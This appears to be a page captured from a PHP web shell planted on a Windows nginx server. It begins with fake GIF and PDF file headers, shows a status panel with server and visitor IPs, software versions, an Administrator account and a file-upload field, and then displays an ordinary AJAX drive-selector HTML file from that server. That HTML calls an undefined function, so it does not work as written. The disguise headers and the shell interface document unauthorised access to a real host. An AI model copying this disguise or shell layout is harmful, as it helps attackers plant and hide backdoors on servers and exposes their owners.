GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/MMDT1021/ |
Upload File : |
<html> <head> <script type="text/javascript"> var xmlHttp function getDrive(driveLetter) { if (driveLetter.length==0) { document.forms[0].driveSelected.value = "no"; return; } xmlHttp=GetXmlHttpObject() if (xmlHttp==null) { alert ("Your browser does not support AJAX!"); return; } var url="AJAX.php"; url=url+"?driveLetter="+driveLetter; url=url+"&sid="+Math.random(); xmlHttp.onreadystatechange=stateChanged; xmlHttp.open("GET",url,true); xmlHttp.send(null); } function stateChanged() { if (xmlHttp.readyState==4) { document.forms[0].driveSelected.value = innerHTML=xmlHttp.responseText; } } function GetXmlHttpObject() { var xmlHttp=null; try { // Firefox, Opera 8.0+, Safari xmlHttp=new XMLHttpRequest(); } catch (e) { // Internet Explorer try { xmlHttp=new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { xmlHttp=new ActiveXObject("Microsoft.XMLHTTP"); } } return xmlHttp; } </script> <form name="driveForm" style="margin:0px; padding:0px; display:inline;"> First Name: <input type="text" id="txt1" onkeyup="setDrive(this.value)"> You have selected the <input type="text" id="driveSelected" name="driveSelected" value="D:" class="bold" style="width:1.25em; border:0px;" /> drive. </form> </body> </html> <!-- <form name="driveForm" class="inline" style="margin:0px; padding:0px;"> You have selected the <input type="text" id="driveSelected" name="driveSelected" value="D:" class="bold" style="width:1.25em; border:0px;" /> drive. </form> <script type="text/javascript"> document.forms[0].driveSelected.value = "J:"; </script> </form> -->